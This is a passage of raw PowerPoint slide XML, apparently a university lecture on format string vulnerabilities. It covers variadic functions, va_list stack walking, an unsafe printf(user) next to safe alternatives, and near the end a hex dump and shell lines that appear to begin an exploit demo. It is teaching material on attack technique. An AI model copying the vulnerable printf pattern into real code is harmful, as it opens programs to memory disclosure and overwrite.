                  <a:pt x="298824" y="1196897"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="313765" y="1206858"/>
                  <a:pt x="327142" y="1219706"/>
                  <a:pt x="343647" y="1226780"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="362521" y="1234869"/>
                  <a:pt x="383743" y="1235820"/>
                  <a:pt x="403412" y="1241721"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="433582" y="1250772"/>
                  <a:pt x="463177" y="1261642"/>
                  <a:pt x="493059" y="1271603"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="582706" y="1301485"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="752039" y="1291524"/>
                  <a:pt x="921922" y="1288481"/>
                  <a:pt x="1090706" y="1271603"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1122048" y="1268469"/>
                  <a:pt x="1180353" y="1241721"/>
                  <a:pt x="1180353" y="1241721"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1190314" y="1231760"/>
                  <a:pt x="1198156" y="1219086"/>
                  <a:pt x="1210235" y="1211838"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1223740" y="1203735"/>
                  <a:pt x="1242960" y="1206980"/>
                  <a:pt x="1255059" y="1196897"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1274189" y="1180955"/>
                  <a:pt x="1286685" y="1158249"/>
                  <a:pt x="1299883" y="1137132"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1326259" y="1094931"/>
                  <a:pt x="1330182" y="1076117"/>
                  <a:pt x="1344706" y="1032544"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1368060" y="799004"/>
                  <a:pt x="1380616" y="740137"/>
                  <a:pt x="1344706" y="434897"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1341796" y="410166"/>
                  <a:pt x="1314824" y="395054"/>
                  <a:pt x="1299883" y="375132"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1289225" y="343161"/>
                  <a:pt x="1282317" y="309336"/>
                  <a:pt x="1255059" y="285485"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1228031" y="261835"/>
                  <a:pt x="1165412" y="225721"/>
                  <a:pt x="1165412" y="225721"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1110199" y="142899"/>
                  <a:pt x="1167121" y="208409"/>
                  <a:pt x="1090706" y="165956"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1059311" y="148515"/>
                  <a:pt x="1040902" y="126113"/>
                  <a:pt x="1001059" y="106191"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="961216" y="86270"/>
                  <a:pt x="884019" y="58878"/>
                  <a:pt x="851647" y="46427"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="819275" y="33976"/>
                  <a:pt x="822103" y="35305"/>
                  <a:pt x="806824" y="31485"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="782187" y="25326"/>
                  <a:pt x="756755" y="22703"/>
                  <a:pt x="732118" y="16544"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="716839" y="12724"/>
                  <a:pt x="702979" y="3029"/>
                  <a:pt x="687294" y="1603"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="647615" y="-2004"/>
                  <a:pt x="607608" y="1603"/>
                  <a:pt x="567765" y="1603"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln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878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 Attacks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26328" y="4267200"/>
            <a:ext cx="423187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Assigned Reading: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Exploiting Format String Vulnerabilities</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>scut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> / Team </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Teso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03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i="1" dirty="0"/>
              <a:t>If an attacker is able to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>provide the format </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>an ANSI C format function in part or as a whole, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>format string vulnerability is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>present.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>” – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>scut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/team </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>teso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Channeling Vulnerabilities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1007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... arise when control and data</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>are mixed into one channel. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US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37392"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="558624" y="3161490"/>
          <a:ext cx="8026752" cy="2667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06688"/>
                <a:gridCol w="2006688"/>
                <a:gridCol w="2006688"/>
                <a:gridCol w="20066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Format</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> Strings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string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Format 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Disclose</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> or write to memory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malloc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> buffers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malloc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US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Heap metadata info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hijack/write to memory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hijack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Phreaking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Voice or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Operator tones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Seize</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> line control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nsolas"/>
              </a:rPr>
              <a:t>Don’t abuse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Wrong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81201"/>
            <a:ext cx="4040188" cy="179126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wrong(char *user)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</a:t>
            </a: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 smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(user);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179126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dirty="0" err="1">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>int</a:t>
            </a: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ok(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>char *user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean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{</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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</a:t>
            </a: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 smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(“%s”, user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty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}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Folded Corner 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4724400" y="4114800"/>
            <a:ext cx="3962400" cy="1726347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3716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cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Alternatives: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  <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>fputs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(user, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>stdout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400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puts(user) //newline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How format strings, and more generally variadic functions, are implemented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How to exploit format string vulnerabilities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 Functions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388468"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="3500120"/>
          <a:ext cx="8229600" cy="2595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24200"/>
                <a:gridCol w="510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/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>printf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prints to </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Consolas"/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>stdout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/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>fprintf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prints to a </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0">
                          <a:latin typeface="Consolas"/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>FILE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t> stream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/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>sprintf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prints</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> to a string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/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>vfprintf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prints to a </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0">
                          <a:latin typeface="Consolas"/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>FILE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                        <a:t> stream from </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Consolas"/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>va_list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/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>syslog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writes a message to the system log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nsolas"/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>setproctitle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sets </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Consolas"/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>argv</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" smtClean="0">
                          <a:latin typeface="Consolas"/>
                          <a:cs typeface="Consolas"/>
                        </a:rPr>
                        <a:t>[0]</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US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172571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onsolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>fmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, ...)</a:t>
            </a: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682924" y="2556760"/>
            <a:ext cx="2355676" cy="659260"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50135"/>
              <a:gd name="adj2" fmla="val -10220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Specifies number and types of arguments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340524" y="2556760"/>
            <a:ext cx="2355676" cy="659260"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -65928"/>
              <a:gd name="adj2" fmla="val -10474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 number of arguments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Variadic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… are functions of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>indefinite </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>arity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Widely supported in languages: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C++</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Perl</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>PHP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>...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4724400" y="4114800"/>
            <a:ext cx="3962400" cy="1634520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3716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cs typeface="Consolas"/>
              </a:rPr>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>cdecl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, caller is responsible to clean up the arguments.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  <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>Can you guess why?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non-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>variadic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> functions, the compiler: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nows number and types of arguments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mits instructions for caller to push arguments</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>right to left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mits instructions for callee to access arguments</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>via frame pointer (or stack pointer [advanced])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variadic functions, the compiler emits instructions for the program to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>walk the stack at runtime for arguments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Suppose we want to implement a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>-like function that only prints when a debug key is set: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895600"/>
            <a:ext cx="8229600" cy="2810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void debug(char *key, char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>fmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, ...) {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va_list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 err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ap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char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>[BUFSIZE];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="24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if (!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>KeyInList</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(key)) return;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/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va_start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ap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fmt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vsprintf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buf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fmt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ap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va_end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ap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 smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>(“%s”, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>buf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}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934318" y="3623803"/>
            <a:ext cx="3371482" cy="698040"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -107650"/>
              <a:gd name="adj2" fmla="val 7748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up </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to point to stack using last fixed argument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733800" y="5248873"/>
            <a:ext cx="1812805" cy="361216"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -137184"/>
              <a:gd name="adj2" fmla="val -12057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Cleanup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169403" y="4622388"/>
            <a:ext cx="3283890" cy="339326"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -99351"/>
              <a:gd name="adj2" fmla="val -611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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>vsprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>args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943600" y="3048000"/>
            <a:ext cx="2780696" cy="393240"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -177073"/>
              <a:gd name="adj2" fmla="val 919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argument pointer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>ap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4962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4290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Think of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>va_list</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> as</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>a pointer to the</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>second argument</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(first after format)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Each format specifier indicates</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> of current </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>arg</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Know how far to increment pointer for next </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>arg</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Rounded Rectangular Callout 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3352800" y="3657600"/>
            <a:ext cx="1417597" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -123682"/>
              <a:gd name="adj2" fmla="val -14958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format</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>specifier</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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3352800" y="2620428"/>
            <a:ext cx="1828800" cy="884772"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -105504"/>
              <a:gd name="adj2" fmla="val -4335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specified argument (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>va_list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3352799" y="1676400"/>
            <a:ext cx="1417597" cy="822325"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -119382"/>
              <a:gd name="adj2" fmla="val -2508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n-1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0" smtClean="0"/>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> specified argument</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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104495"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="824442" y="1371600"/>
          <a:ext cx="1461558" cy="4859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callee-save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9333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47935" y="4347939"/>
            <a:ext cx="492443" cy="7201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callee</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Left Brace 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="537865" y="3200400"/>
            <a:ext cx="286577" cy="301521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>
            <a:off x="533400" y="1371600"/>
            <a:ext cx="286577" cy="18288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47935" y="2000236"/>
            <a:ext cx="492443" cy="70109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caller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246823"/>
            <a:ext cx="8839200" cy="480131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$ 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  <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>iwconfig</a:t>
            </a:r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  <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>accesspoint</a:t>
            </a:r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$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>iwconfig</a:t>
            </a:r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>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="24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nsolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>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4685" y="351949"/>
            <a:ext cx="874230" cy="40862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mbria"/>
              </a:rPr>
              <a:t>OK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Right Brace 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="2743200" y="103821"/>
            <a:ext cx="457200" cy="1828800"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrac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781" y="1981065"/>
            <a:ext cx="4029638" cy="36933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a-DK" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>01ad </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>0101 0101 0101 0101 0101 0101 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>0101 0101 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>0101 0101 0101 0101 0101 0101 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>0101 0101 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
              </a:rPr>
              <a:t>0101 fce8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
